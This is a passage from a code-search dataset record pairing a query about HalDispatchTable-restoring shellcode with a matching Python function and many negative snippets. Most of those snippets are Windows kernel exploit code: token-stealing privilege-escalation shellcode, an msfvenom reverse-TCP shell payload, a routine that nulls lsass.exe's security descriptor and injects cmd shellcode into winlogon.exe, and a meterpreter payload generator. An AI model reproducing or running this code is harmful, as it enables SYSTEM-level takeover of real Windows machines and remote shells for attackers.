commands.getoutput(\"sw_vers -buildVersion\")\n\n # Carve out the major version as we use this a bunch\n # self.os_maj_ver = \".\".join(self.os_version.split(\".\")[:2])\n\n # Add gathered info to the dictionary to query the API with\n self.endpoints_to_check[\"127.0.0.1\"] = {\n \"hashed_uuid\": self.h_sys_uuid,\n \"hw_ver\": self.hw_version,\n \"rom_ver\": self.efi_version,\n \"smc_ver\": self.smc_version,\n \"board_id\": self.board_id,\n \"os_ver\": self.os_version,\n \"build_num\": self.build_num}\n\n return True", "def get_os_version(self):\n\t\treturn call_sdk_function('PrlVmCfg_GetOsVersion', self.handle)", "def set_platform(self, platform_dict):\n if not os.path.exists(self.file_path):\n print(\"netCDF file does not exist, exiting without saving Platform group...\")\n elif self.format == '.nc':\n with netCDF4.Dataset(self.file_path, 'a', format='NETCDF4') as ncfile:\n plat = ncfile.createGroup('Platform')\n [plat.setncattr(k, v) for k, v in platform_dict.items()]\n elif self.format == '.zarr' and not self.append_zarr: # Do not save platform if appending\n zarrfile = zarr.open(self.file_path, mode='a')\n plat = zarrfile.create_group('Platform')\n for k, v in platform_dict.items():\n plat.attrs[k] = v", "def _extract_nos_version(self, data: str) -> None:\n if self.devtype == \"linux\":\n for line in data.splitlines():\n if line.startswith(\"VERSION_ID\"):\n self.version = line.split('=')[1] \\\n .strip().replace('\"', '')\n break\n else:\n self.version = \"all\"\n self.logger.error(\n f'Cannot parse version from {self.address}:{self.port}')", "def detect_os(self, env=None):\n if env is None:\n env = os.environ\n if 'ROS_OS_OVERRIDE' in env:\n splits = 
env[\"ROS_OS_OVERRIDE\"].split(':')\n self._os_name = splits[0]\n if len(splits) > 1:\n self._os_version = splits[1]\n if len(splits) > 2:\n self._os_codename = splits[2]\n else:\n self._os_codename = ''\n else:\n self._os_version = self._os_codename = ''\n self._override = True\n else:\n for os_name, os_detector in self._os_list:\n if os_detector.is_os():\n self._os_name = os_name\n self._os_version = os_detector.get_version()\n self._os_codename = os_detector.get_codename()\n self._os_detector = os_detector\n break\n\n if self._os_name:\n return self._os_name, self._os_version, self._os_codename\n else: # No solution found\n attempted = [x[0] for x in self._os_list]\n raise OsNotDetected(\"Could not detect OS, tried %s\" % attempted)", "def java_ver(release='', vendor='', vminfo=('', '', ''), osinfo=('', '', '')):\n # Import the needed APIs\n try:\n import java.lang\n except ImportError:\n return release, vendor, vminfo, osinfo\n\n vendor = _java_getprop('java.vendor', vendor)\n release = _java_getprop('java.version', release)\n vm_name, vm_release, vm_vendor = vminfo\n vm_name = _java_getprop('java.vm.name', vm_name)\n vm_vendor = _java_getprop('java.vm.vendor', vm_vendor)\n vm_release = _java_getprop('java.vm.version', vm_release)\n vminfo = vm_name, vm_release, vm_vendor\n os_name, os_version, os_arch = osinfo\n os_arch = _java_getprop('java.os.arch', os_arch)\n os_name = _java_getprop('java.os.name', os_name)\n os_version = _java_getprop('java.os.version', os_version)\n osinfo = os_name, os_version, os_arch\n\n return release, vendor, vminfo, osinfo", "async def osversion(self):\n\n await self.bot.say(box(release(), 'Bash'))", "def update_runtime_variables(self) -> None:\n # Opportunistic, works if SELinux not enforced\n super().update_runtime_variables()\n self.parse_sysconfig_var()", "def test_device_info_guess_os(properties, expected_os):\n assert DeviceInfo(properties).operating_system == expected_os", "def get_os_info(hass: HomeAssistant) -> dict[str, Any] | None:\n return hass.data.get(DATA_OS_INFO)", "def os_version(self, os_version):\n\n self._os_version = os_version", "def setUp(self):\n self.os = \"debian\"", "def known_os_type():\n return 'Linux'", "def mac_ver(release='', versioninfo=('', '', ''), machine=''):\n\n # First try reading the information from an XML file which should\n # always be present\n info = _mac_ver_xml()\n if info is not None:\n return info\n\n # If that also doesn't work return the default values\n return release, versioninfo, machine", "def __init__(self) -> None:\n super().__init__()\n self.version = 6\n (self.ofproto, self.ofparser) = ofproto_protocol._versions[self.version]\n self.mac_to_port = {}", "def _setup(self) -> None:\n self._api = get_api(\n self._password,\n self._host,\n self._username,\n self._port,\n self._ssl,\n )\n\n self._info = self._api.get_info()\n self.device_name = self._info.get(\"DeviceName\", DEFAULT_NAME)\n self.model = self._info.get(\"ModelName\")\n self.firmware_version = self._info.get(\"Firmwareversion\")\n\n for model in MODELS_V2:\n if self.model.startswith(model):\n self._method_version = 2", "def update(self):\n if self._var_id == UTILISATION_MONITOR_VERSION:\n version = dockerVersion(self._api)\n self._state = version.get('version', None)\n self._attributes['api_version'] = version.get('api_version', None)\n self._attributes['os'] = version.get('os', None)\n self._attributes['arch'] = version.get('arch', None)" ]
[ "0.660985", "0.6493364", "0.6464224", "0.6365165", "0.61576086", "0.61220306", "0.6116219", "0.60081536", "0.5985952", "0.59510773", "0.59318006", "0.5889762", "0.5821946", "0.58032054", "0.57683593", "0.5690011", "0.56563735", "0.56455976", "0.56320095", "0.5627637", "0.56080556", "0.55995905", "0.55937076", "0.5589993", "0.5564112", "0.5563756", "0.5543639", "0.5537523", "0.5532638", "0.55086285" ]
0.65764755
1
Return a shellcode to restore HalDispatchTable ptrs
def retore_hal_ptrs(HalDispatchTable,HaliQuerySystemInformation,HalpSetSystemInformation): if HaliQuerySystemInformation == 0x0 or HalpSetSystemInformation == 0x0: return "" else: shellcode = ( "\x31\xc0" "\xb8" + struct.pack("L", HalpSetSystemInformation) + "\xa3" + struct.pack("L", HalDispatchTable + 0x8) + "\xb8" + struct.pack("L", HaliQuerySystemInformation) + "\xa3" + struct.pack("L", HalDispatchTable + 0x4) ) return shellcode
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _ret_shellcode_buffer():\n\n shellcode = bytearray(\n #---[Debug]\n \"\\xCC\"\n #---[Setup]\n \"\\x60\" # pushad\n \"\\x64\\xA1\\x24\\x01\\x00\\x00\" \t # mov eax, fs:[KTHREAD_OFFSET]\n \"\\x8B\\x40\\x50\" # mov eax, [eax + EPROCESS_OFFSET]\n \"\\x89\\xC1\" # mov ecx, eax (Current _EPROCESS structure)\n \"\\x8B\\x98\\xF8\\x00\\x00\\x00\" \t # mov ebx, [eax + TOKEN_OFFSET]\n #---[Copy System PID token]\n \"\\xBA\\x04\\x00\\x00\\x00\" # mov edx, 4 (SYSTEM PID)\n \"\\x8B\\x80\\xB8\\x00\\x00\\x00\" # mov eax, [eax + FLINK_OFFSET] <-|\n \"\\x2D\\xB8\\x00\\x00\\x00\" # sub eax, FLINK_OFFSET |\n \"\\x39\\x90\\xB4\\x00\\x00\\x00\" # cmp [eax + PID_OFFSET], edx |\n \"\\x75\\xED\" # jnz ->|\n \"\\x8B\\x90\\xF8\\x00\\x00\\x00\" # mov edx, [eax + TOKEN_OFFSET]\n \"\\x89\\x91\\xF8\\x00\\x00\\x00\" # mov [ecx + TOKEN_OFFSET], edx\n #---[Recover]\n \"\\x61\" # popad\t\t\n \"\\xC3\" # ret\n )\n\n MEM_COMMIT_MEM_RESERVE = 0x3000\n PAGE_EXECUTE_READWRITE = 0x40\n\t\n ptr = kernel32.VirtualAlloc(\n c_int(0), # lpAddress\n c_int(len(shellcode)), # dwSize\n c_int(MEM_COMMIT_MEM_RESERVE), # flAllocationType\n c_int(PAGE_EXECUTE_READWRITE) # flProtect\n )\n \n shellcode_ptr = (c_char * len(shellcode)).from_buffer(shellcode)\n\n kernel32.RtlMoveMemory(\n c_int(ptr),\n shellcode_ptr,\n c_int(len(shellcode))\n )\n \n return ptr, len(shellcode)", "def add_shellcode() -> bytes:\n # msfvenom -p windows/shell_reverse_tcp EXITFUNC=thread lhost=eth0 lport=4444 \n # -f c -b \"\\x00\\x20\\x25\\x2b\\x2f\\x5c\"\n #Payload size: 351 bytes\n shellcode = b\"\"\n shellcode += b\"\\xba\\x6e\\x70\\x53\\xc6\\xdb\\xc4\\xd9\\x74\\x24\\xf4\\x5e\\x31\\xc9\\xb1\"\n shellcode += b\"\\x52\\x31\\x56\\x12\\x03\\x56\\x12\\x83\\xa8\\x74\\xb1\\x33\\xc8\\x9d\\xb7\"\n shellcode += b\"\\xbc\\x30\\x5e\\xd8\\x35\\xd5\\x6f\\xd8\\x22\\x9e\\xc0\\xe8\\x21\\xf2\\xec\"\n shellcode += b\"\\x83\\x64\\xe6\\x67\\xe1\\xa0\\x09\\xcf\\x4c\\x97\\x24\\xd0\\xfd\\xeb\\x27\"\n shellcode += b\"\\x52\\xfc\\x3f\\x87\\x6b\\xcf\\x4d\\xc6\\xac\\x32\\xbf\\x9a\\x65\\x38\\x12\"\n shellcode += b\"\\x0a\\x01\\x74\\xaf\\xa1\\x59\\x98\\xb7\\x56\\x29\\x9b\\x96\\xc9\\x21\\xc2\"\n shellcode += b\"\\x38\\xe8\\xe6\\x7e\\x71\\xf2\\xeb\\xbb\\xcb\\x89\\xd8\\x30\\xca\\x5b\\x11\"\n shellcode += b\"\\xb8\\x61\\xa2\\x9d\\x4b\\x7b\\xe3\\x1a\\xb4\\x0e\\x1d\\x59\\x49\\x09\\xda\"\n shellcode += b\"\\x23\\x95\\x9c\\xf8\\x84\\x5e\\x06\\x24\\x34\\xb2\\xd1\\xaf\\x3a\\x7f\\x95\"\n shellcode += b\"\\xf7\\x5e\\x7e\\x7a\\x8c\\x5b\\x0b\\x7d\\x42\\xea\\x4f\\x5a\\x46\\xb6\\x14\"\n shellcode += b\"\\xc3\\xdf\\x12\\xfa\\xfc\\x3f\\xfd\\xa3\\x58\\x34\\x10\\xb7\\xd0\\x17\\x7d\"\n shellcode += b\"\\x74\\xd9\\xa7\\x7d\\x12\\x6a\\xd4\\x4f\\xbd\\xc0\\x72\\xfc\\x36\\xcf\\x85\"\n shellcode += b\"\\x03\\x6d\\xb7\\x19\\xfa\\x8e\\xc8\\x30\\x39\\xda\\x98\\x2a\\xe8\\x63\\x73\"\n shellcode += b\"\\xaa\\x15\\xb6\\xd4\\xfa\\xb9\\x69\\x95\\xaa\\x79\\xda\\x7d\\xa0\\x75\\x05\"\n shellcode += b\"\\x9d\\xcb\\x5f\\x2e\\x34\\x36\\x08\\x91\\x61\\x5b\\xab\\x79\\x70\\x9b\\x3a\"\n shellcode += b\"\\x26\\xfd\\x7d\\x56\\xc6\\xab\\xd6\\xcf\\x7f\\xf6\\xac\\x6e\\x7f\\x2c\\xc9\"\n shellcode += b\"\\xb1\\x0b\\xc3\\x2e\\x7f\\xfc\\xae\\x3c\\xe8\\x0c\\xe5\\x1e\\xbf\\x13\\xd3\"\n shellcode += b\"\\x36\\x23\\x81\\xb8\\xc6\\x2a\\xba\\x16\\x91\\x7b\\x0c\\x6f\\x77\\x96\\x37\"\n shellcode += b\"\\xd9\\x65\\x6b\\xa1\\x22\\x2d\\xb0\\x12\\xac\\xac\\x35\\x2e\\x8a\\xbe\\x83\"\n shellcode += b\"\\xaf\\x96\\xea\\x5b\\xe6\\x40\\x44\\x1a\\x50\\x23\\x3e\\xf4\\x0f\\xed\\xd6\"\n shellcode += 
b\"\\x81\\x63\\x2e\\xa0\\x8d\\xa9\\xd8\\x4c\\x3f\\x04\\x9d\\x73\\xf0\\xc0\\x29\"\n shellcode += b\"\\x0c\\xec\\x70\\xd5\\xc7\\xb4\\x91\\x34\\xcd\\xc0\\x39\\xe1\\x84\\x68\\x24\"\n shellcode += b\"\\x12\\x73\\xae\\x51\\x91\\x71\\x4f\\xa6\\x89\\xf0\\x4a\\xe2\\x0d\\xe9\\x26\"\n shellcode += b\"\\x7b\\xf8\\x0d\\x94\\x7c\\x29\"\n return shellcode", "def _exploit(code):\n shellcode_ptr, shellcode_len = _ret_shellcode_buffer() # shellcode virtual allocation\n\n debug_print(\"\\n[*] User-land shellcode allocated at: [0x%x]\\n\" % shellcode_ptr)\n debug_print(hexdump(shellcode_ptr, 32))\n \"\"\"\n 3: kd> !process 0 0 lsass.exe\n PROCESS [87662d40] SessionId: 1 Cid: 0214 Peb: 7ffd9000 ParentCid: 01ac\n DirBase: be6e20e0 ObjectTable: 9aa8a008 HandleCount: 116.\n Image: lsass.exe\n\n 3: kd> dps 87662d40-4\n 87662d3c 8c005e1f => OVERFLOW HERE WITH [0x00000000] \n 87662d40 00260003 AND GET ALL PERMISSIONS OF [lsass.exe] process W/ WHATAEVER USER\n 87662d44 00000001\n 87662d48 87662d48\n 87662d4c 87662d48\n 87662d50 87662d50\n 87662d54 87662d50\n 87662d58 be6e20e0\n 87662d5c 00000000\n 87662d60 00000000\n\n 3: kd> !object 87662d40 \n Object: 87662d40 Type: (85611d58) Process\n ObjectHeader: [87662d28] (new version) => [dt nt!_OBJECT_HEADER 87662d28]\n HandleCount: 10 PointerCount: 106\n\n 3: kd> dt nt!_OBJECT_HEADER 87662d28 \n +0x000 PointerCount : 0n106\n +0x004 HandleCount : 0n10\n +0x004 NextToFree : 0x0000000a Void\n +0x008 Lock : _EX_PUSH_LOCK\n +0x00c TypeIndex : 0x7 ''\n +0x00d TraceFlags : 0 ''\n +0x00e InfoMask : 0x8 ''\n +0x00f Flags : 0 ''\n +0x010 ObjectCreateInfo : 0x82b44cc0 _OBJECT_CREATE_INFORMATION\n +0x010 QuotaBlockCharged : 0x82b44cc0 Void\n +0x014 SecurityDescriptor : 0x8c005e1d Void \n +0x018 Body : _QUAD\n\n 3: kd> !sd (0x8c005e1f - 0x7) => [SecurityDescription from lsass.exe process]\n ->Revision: 0x1\n ->Sbz1 : 0x0\n ->Control : 0x8814\n SE_DACL_PRESENT\n SE_SACL_PRESENT\n SE_SACL_AUTO_INHERITED\n SE_SELF_RELATIVE\n ->Owner : S-1-5-32-544\n ->Group : S-1-5-18\n ->Dacl : \n ->Dacl : ->AclRevision: 0x2\n ->Dacl : ->Sbz1 : 0x0\n ->Dacl : ->AclSize : 0x3c\n ->Dacl : ->AceCount : 0x2\n ->Dacl : ->Sbz2 : 0x0\n ->Dacl : ->Ace[0]: ->AceType: ACCESS_ALLOWED_ACE_TYPE\n ->Dacl : ->Ace[0]: ->AceFlags: 0x0\n ->Dacl : ->Ace[0]: ->AceSize: 0x14\n ->Dacl : ->Ace[0]: ->Mask : 0x001fffff\n ->Dacl : ->Ace[0]: ->SID: S-1-5-18\n\n ->Dacl : ->Ace[1]: ->AceType: ACCESS_ALLOWED_ACE_TYPE\n ->Dacl : ->Ace[1]: ->AceFlags: 0x0\n ->Dacl : ->Ace[1]: ->AceSize: 0x18\n ->Dacl : ->Ace[1]: ->Mask : 0x00121411\n ->Dacl : ->Ace[1]: ->SID: S-1-5-32-544\n\n ->Sacl : \n ->Sacl : ->AclRevision: 0x2\n ->Sacl : ->Sbz1 : 0x0\n ->Sacl : ->AclSize : 0x1c\n ->Sacl : ->AceCount : 0x1\n ->Sacl : ->Sbz2 : 0x0\n ->Sacl : ->Ace[0]: ->AceType: SYSTEM_MANDATORY_LABEL_ACE_TYPE\n ->Sacl : ->Ace[0]: ->AceFlags: 0x0\n ->Sacl : ->Ace[0]: ->AceSize: 0x14\n ->Sacl : ->Ace[0]: ->Mask : 0x00000003\n ->Sacl : ->Ace[0]: ->SID: S-1-16-16384\n \"\"\"\n \n lsass_pid = getPidByName(\"lsass.exe\")\n debug_print(\"\\n[!] 
lsass.exe PID: 0x%x\\n\" % lsass_pid)\n \n leaked_objects = get_handles(lsass_pid) # return lsass.exe handles (nt!_EPROCESS)\n \n #if leaked_objects:\n #debug_print(\"\\n[+] lsass.exe nt!_EPROCESS address leaked!!: [0x%x]\" % leaked_objects)\n \n for leak_obj in leaked_objects:\n\n SecurityDescription = leak_obj - 4 # nullify SecurityDescription located at [_EPROCESS - 4]\n debug_print(\"\\t\\t[*] Address of SecurityDescription to be nullify: [0x%x]\" % SecurityDescription)\n \n payload = struct.pack(\"<L\", SecurityDescription)\n payload_ptr = id(payload) + 0x14\n payload_len = len(payload)\n \n # send custom payload\n _send_payload(\n payload_ptr,\n payload_len,\n code\n )\n\n debug_print(\"[+] Exploit Payload Sent!\")\n debug_print(\"[!] Getting nt-authority/SYSTEM impersonated process shell...\")\n \n winlogon_pid = getPidByName(\"winlogon.exe\")\n return inject_shellcode(winlogon_pid) # get SYSTEM shell", "def execute_64bits_code_from_syswow(shellcode):\n if not windows.current_process.is_wow_64:\n raise ValueError(\"Calling execute_64bits_code_from_syswow from non-syswow process\")\n addr = windows.winproxy.VirtualAlloc(dwSize=0x1000)\n # post-exec 32bits stub (xor eax, eax; ret)\n ret = \"\\xC3\"\n ret_addr = addr\n shell_code_addr = ret_addr + len(ret) + len(dummy_jump)\n # ljmp\n jump = \"\\xea\" + struct.pack(\"<I\", shell_code_addr) + chr(CS_64bits) + \"\\x00\\x00\"\n jump_addr = ret_addr + len(ret)\n # Return to 32bits stub\n shellcode += genere_return_32bits_stub(ret_addr)\n # WRITE ALL THE STUBS\n windows.current_process.write_memory(ret_addr, ret)\n windows.current_process.write_memory(jump_addr, jump)\n windows.current_process.write_memory(shell_code_addr, shellcode)\n # Execute\n exec_stub = ctypes.CFUNCTYPE(HRESULT)(jump_addr)\n return exec_stub()", "def tokenstealingx86(RETVAL, extra = \"\"):\n\t(KPROCESS,APLINKS,UPID,TOKEN) = setosvariablesx86()\n\tshellcode = (\n\t\"\\x60\"\t\t\t\t\t\t\t\t\t\t# pushad\n\t\"\\x33\\xc0\"\t\t\t\t\t\t\t\t\t# xor\teax,eax\n\t\"\\x64\\x8b\\x80\\x24\\x01\\x00\\x00\"\t\t\t\t# mov\teax,DWORD PTR fs:[eax+0x124]\n\t\"\\x8b\\x40\" + KPROCESS +\t\t\t\t\t\t# mov\teax,DWORD PTR [eax+_KPROCESS]\n\t\"\\x8b\\xc8\"\t\t\t\t\t\t\t\t\t# mov\tecx,eax\n\t\"\\x8b\\x80\" + APLINKS + \"\\x00\\x00\\x00\"\t\t# mov\teax,DWORD PTR [eax+0xb8]\n\t\"\\x2d\" + APLINKS + \"\\x00\\x00\\x00\"\t\t\t# sub\teax,0xb8\n\t\"\\x83\\xb8\" + UPID + \"\\x00\\x00\\x00\\x04\"\t\t# cmp\tDWORD PTR [eax+0xb4],0x4\n\t\"\\x75\\xec\"\t\t\t\t\t\t\t\t\t# jne\t0xe\n\t\"\\x8b\\x90\" + TOKEN + \"\\x00\\x00\\x00\"\t\t\t# mov\tedx,DWORD PTR [eax+0xf8]\n\t\"\\x89\\x91\" + TOKEN + \"\\x00\\x00\\x00\"\t\t\t# mov\tDWORD PTR [ecx+0xf8],edx\n\t\"\\x61\"\t\t\t\t\t\t\t\t\t\t# popad\n\t)\n\t\n\tshellcode += extra #append extra code after token stealing shellcode, e.g.: restore stack\n\t\n\tif RETVAL == \"\":\n\t\tshellcode += \"\\xc3\"\t\t\t\t\t\t#retn\n\telse:\n\t\tshellcode += \"\\xc2\" + RETVAL + \"\\x00\"\t# ret\t0x8\t\n\t\n\treturn shellcode", "def disassemble(self, script):\n return ' '.join(self.opcode_list(script))", "def get_idcode_opcode(bsdl_as_json):\n instruction_registers = bsdl_as_json[\"instruction_register_description\"][\"instruction_opcodes\"]\n idcode_instruction = next(\n reg for reg in instruction_registers if reg[\"instruction_name\"] == \"IDCODE\"\n )\n idcode_opcode = idcode_instruction[\"opcode_list\"][0]\n return idcode_opcode", "def get(self):\r\n # Update of 0.3.6\r\n # Some custom shells will not need TARGET and PORT strings.\r\n # To deal with that, I will just try to find 
them in the string first.\r\n if \"TARGET\" in self.code and \"PORT\" in self.code:\r\n self.code = str(self.code.replace(\"TARGET\", self.host)).replace(\"PORT\", str(self.port))\r\n else:\r\n # Custom shell. Here we need to program individually based in specifics.\r\n if \"bloodseeker\" in self.name.lower(): # This is for Bloodseeker project.\r\n \r\n # This one requires a stager.\r\n if self.args.stager is None:\r\n print(error(\"This payload REQUIRES --stager flag.\"))\r\n exit(1)\r\n \r\n print(info(\"Generating shellcode ...\"))\r\n malicious_script = str(WINDOWS_BLOODSEEKER_SCRIPT.decode(\"base64\")).replace(\"SHELLCODEHERE\", shellcode_to_ps1(\"windows/x64/meterpreter/reverse_tcp\", self.args.host, self.args.port))\r\n self.code = malicious_script.replace(\"PROCESSNAME\", \"explorer\") # we want inject into explorer.exe\r\n print(alert(\"Make sure you have a handler for windows/x64/meterpreter/reverse_tcp listening in your machine.\"))\r\n print(alert(\"It is recommended to use the --base64 flag.\"))\r\n return self.code # we dont need encoder in this one.\r\n else:\r\n print(error(\"No custom shell procedure was arranged for this shell. This is fatal.\"))\r\n exit(1)\r\n\r\n \r\n # Apply xor encoding.\r\n self.code = self.code if self.args.xor is 0 else xor_wrapper(self.name, self.code, self.args)\r\n\r\n # Apply base64 encoding.\r\n self.code = base64_wrapper(self.name, self.code, self.args)\r\n\r\n # Apply URL-encoding\r\n if self.args.urlencode is True and self.args.stager is None:\r\n self.code = to_urlencode(self.code)\r\n \r\n return self.code", "def process(opcode):\n opcode.process()", "def extract_code(self, data):\n current = struct.calcsize(b'iiii')\n metadata = struct.unpack(b'iiii', data[:current])\n\n if metadata[0] != 0x78563412:\n raise InvalidPy2ExeFile(\"Invalid PYTHONSCRIPT header\")\n\n arcname = ''\n while six.indexbytes(data, current) != 0:\n arcname += chr(six.indexbytes(data, current))\n current += 1\n code_bytes = data[current + 1:]\n code_objects = marshal.loads(code_bytes)\n return code_objects", "def execute(self, symbol_table, test_mode=False):", "def execute(self, symbol_table, test_mode=False):", "def _interpret(cls, code):\n namespace = {}\n namespace.update(selectors.SELECTORS)\n exec(code, namespace)\n header = LowerCaseDict(namespace[\"header\"])\n selector = namespace[\"selector\"]\n comment = namespace.get(\"comment\", None)\n if isinstance(selector, selectors.Parameters):\n return header, selector.instantiate(header), comment\n elif isinstance(selector, dict):\n return header, selector, comment\n else:\n raise crexc.MappingFormatError(\"selector must be a dict or a Selector.\")", "def fetch_execute(self):\n\n op_code = self.mem.read(self.reg.ip)\n self.reg.ip_inc()\n addr = self.mem.read(self.reg.ip)\n self.reg.ip_inc()\n\n # Execute the instruction on addr.\n self.op_codes[op_code.num](addr)", "def restoretokenx86(RETVAL, extra = \"\"):\n\t(KPROCESS,APLINKS,UPID,TOKEN) = setosvariablesx86()\n\tshellcode = (\n\t\"\\x52\"\n\t\"\\x33\\xc0\"\t\t\t\t\t\t\t\t\t# xor\teax,eax\n\t\"\\x64\\x8b\\x80\\x24\\x01\\x00\\x00\"\t\t\t\t# mov\teax,DWORD PTR fs:[eax+0x124]\n\t\"\\x8b\\x40\" + KPROCESS +\t\t\t\t\t# mov\teax,DWORD PTR [eax+_KPROCESS]\n\t\"\\x8b\\x15\\x00\\x09\\x02\\x00\"\n\t\"\\x89\\x90\" + TOKEN + \"\\x00\\x00\\x00\"\t\t\t# mov\tedx,DWORD PTR [eax+0xf8]\n\t\"\\x5a\"\n\t)\n\t\n\tif RETVAL == \"\":\n\t\tshellcode += \"\\xc3\"\t\t\t\t\t\t#retn\n\telse:\n\t\tshellcode += \"\\xc2\" + RETVAL + \"\\x00\"\t# ret\t0x8\t\n\t\n\treturn shellcode", "def 
tokenstealingx64(RETVAL, extra = \"\"):\n\t(KPROCESS,FLINK,UPID,TOKEN) = setosvariablesx64()\n\tshellcode = (\n\t\"\\x65\\x48\\x8b\\x04\\x25\\x88\\x01\\x00\\x00\"\t\t# mov rax, [gs:0x188] ;Get current ETHREAD in\n\t\"\\x48\\x8b\\x40\" + KPROCESS +\t\t\t\t\t# mov rax, [rax+0x68] ;Get current KPROCESS address\n\t\"\\x48\\x89\\xc1\"\t\t\t\t\t\t\t\t# mov rcx, rax ;Copy current KPROCESS address to RCX\n\t\"\\x48\\x8b\\x80\" + FLINK + \"\\x00\\x00\"\t\t\t# mov rax, [rax+0xe0] ;Next KPROCESS ActivKPROCESSLinks.Flink\n\t\"\\x48\\x2d\" + FLINK + \"\\x00\\x00\"\t\t\t\t# sub rax, 0xe0 ;Go to the beginning of the KPROCESS structure\n\t\"\\x4c\\x8b\\x88\" + UPID + \"\\x00\\x00\"\t\t\t# mov r9 , [rax+0xd8] ;Copy PID to R9\n\t\"\\x49\\x83\\xf9\\x04\"\t\t\t\t\t\t\t# cmp r9 , 0x4 ;Compare R9 to SYSTEM PID (=4)\n\t\"\\x75\\xe6\"\t\t\t\t\t\t\t\t\t# jnz short find_system_process ;If not SYSTEM got to next KPROCESS\n\t\"\\x48\\x8b\\x90\" + TOKEN + \"\\x00\\x00\"\t\t\t# mov rdx, [rax+0x160] ;Copy SYSTEM process token address to RDX\n\t\"\\x48\\x89\\x91\" + TOKEN + \"\\x00\\x00\"\t\t\t# mov [rcx+0x160], rdx ;Steal token with overwriting our current process's token address\n\t)\n\t\n\tshellcode += extra #append extra code after token stealing shellcode, e.g.: restore stack\n\n\tif RETVAL == \"\":\n\t\tshellcode += \"\\xc3\"\t\t\t\t\t\t#retn\n\telse:\n\t\tshellcode += \"\\xc2\" + RETVAL + \"\\x00\"\t# ret\t0x8\t\n\t\n\treturn shellcode", "def zero_opcodes(self):\n if self.opcode == 0x00E0:\n self.display.clear_display()\n logger.info(\"Cleared display\")\n elif self.opcode == 0x00EE:\n logger.info(\"Returned from subroutine at {}\".format(hex(self.pc)))\n self.pc = self.stack[self.stack_pointer]\n self.stack.pop()\n self.stack_pointer -= 1\n logger.info(\"to address at {}\".format(hex(self.pc)))", "def generate_64bits_execution_stub_from_syswow(x64shellcode):\n current_process = windows.current_process\n if not current_process.is_wow_64:\n raise ValueError(\"Calling generate_64bits_execution_stub_from_syswow from non-syswow process\")\n\n transition64 = x64.MultipleInstr()\n transition64 += x64.Call(\":TOEXEC\")\n transition64 += x64.Mov(\"RDX\", \"RAX\")\n transition64 += x64.Shr(\"RDX\", 32)\n transition64 += x64.Retf32() # 32 bits return addr\n transition64 += x64.Label(\":TOEXEC\")\n x64shellcodeaddr = thread_state.allocator.write_code(transition64.get_code() + x64shellcode)\n\n transition = x86.MultipleInstr()\n transition += x86.Call(CS_64bits, x64shellcodeaddr)\n # Reset the SS segment selector.\n # We need to do that due to a bug in AMD CPUs with RETF & SS\n # https://github.com/hakril/PythonForWindows/issues/10\n # http://blog.rewolf.pl/blog/?p=1484\n transition += x86.Mov(\"ECX\", \"SS\")\n transition += x86.Mov(\"SS\", \"ECX\")\n transition += x86.Ret()\n\n stubaddr = thread_state.allocator.write_code(transition.get_code())\n exec_stub = ctypes.CFUNCTYPE(ULONG64)(stubaddr)\n return exec_stub", "def process(self, hrd, data):\n\t\teth = dpkt.ethernet.Ethernet(data)\n\t\ta = self.p.decode(eth)\n\t\tif a:\n\t\t\tself.map.append(a)", "def decode(self, h):\n return self.act_decode(self.linearD(h))", "def parse_symbol_table(data, sections, elf_header):\n if is64bit(elf_header):\n symbol_entry_str = symbol_64_entry_str\n symbol_entry_spec = symbol_64_entry_spec\n else:\n symbol_entry_str = symbol_32_entry_str\n symbol_entry_spec = symbol_32_entry_spec\n entry_len = struct.calcsize(symbol_entry_str)\n \n st_offset = None\n if \".symtab\" in sections:\n section = \".symtab\"\n if \".strtab\" in sections:\n 
st_offset = sections[\".strtab\"][\"offset\"]\n else:\n st_offset = sections[section][\"offset\"]\n \n elif \".dynsym\" in sections:\n section = \".dynsym\"\n if \".dynstr\" in sections:\n st_offset = sections[\".dynstr\"][\"offset\"]\n else:\n st_offset = sections[section][\"offset\"]\n \n \n if section not in sections:\n return {}, {} \n \n symbols = {}\n imports = {}\n offset = sections[section][\"offset\"]\n size = sections[section][\"size\"]\n index = offset\n while index < offset + size:\n vals = {}\n if len(data) < index+entry_len: \n break\n \n val_data = struct.unpack(symbol_entry_str, data[index:index+entry_len])\n for i, elem in enumerate(symbol_entry_spec):\n vals[elem[0]] = val_data[i]\n \n if st_offset is None:\n symbols[vals[\"name\"]] = vals\n else:\n func_name = get_name_from_string_table(data, st_offset, vals[\"name\"])\n if func_name:\n vals.pop(\"name\")\n vals[\"info\"] = get_symbol_info(vals[\"info\"])\n vals[\"shndx\"] = get_symbol_shndx(vals[\"shndx\"])\n \n if vals[\"info\"] == \"UNDEFINED\" and vals[\"value\"] == 0:\n tmp_name = func_name\n import_name = \"Unknown\"\n if \"@@\" in func_name:\n i = tmp_name.find(\"@@\")\n func_name = tmp_name[:i]\n import_name = tmp_name[i:].strip(\"@@\") \n if import_name not in imports:\n imports[import_name] = {}\n imports[import_name][func_name] = vals\n symbols[func_name] = vals\n \n index += entry_len \n \n return symbols, imports", "def list():\n\n return cache.codeTableList()", "def code():", "def resolve_code(obj, _):\n return obj.code.decode()", "def inject_shellcode(winlogon_pid): \n \n # Get winlogon.exe pid\n pid = winlogon_pid\n\n # Get a handle to the winprinton process we are injecting into \n hProcess = kernel32.OpenProcess(PROCESS_ALL_ACCESS, False, int(pid))\n\n if not hProcess:\n debug_print(\"\\t[-] Couldn't acquire a handle to PID: %s\" % pid)\n sys.exit()\n\n debug_print(\"\\n\\t[+] Obtained handle [0x%x] for the winlogon.exe process\" % hProcess)\n \n # Creating shellcode buffer to inject into the host process\n # https://packetstormsecurity.com/files/142572/Microsoft-Windows-32-bit-64-bit-cmd.exe-Shellcode.html\n SHELLCODE = (\n \"\\x31\\xc9\\x64\\x8b\\x41\\x30\\x8b\\x40\\x0c\\x8b\\x40\\x1c\\x8b\\x04\\x08\"\n \"\\x8b\\x04\\x08\\x8b\\x58\\x08\\x8b\\x53\\x3c\\x01\\xda\\x8b\\x52\\x78\\x01\"\n \"\\xda\\x8b\\x72\\x20\\x01\\xde\\x41\\xad\\x01\\xd8\\x81\\x38\\x47\\x65\\x74\"\n \"\\x50\\x75\\xf4\\x81\\x78\\x04\\x72\\x6f\\x63\\x41\\x75\\xeb\\x81\\x78\\x08\"\n \"\\x64\\x64\\x72\\x65\\x75\\xe2\\x49\\x8b\\x72\\x24\\x01\\xde\\x66\\x8b\\x0c\"\n \"\\x4e\\x8b\\x72\\x1c\\x01\\xde\\x8b\\x14\\x8e\\x01\\xda\\x89\\xd6\\x31\\xc9\"\n 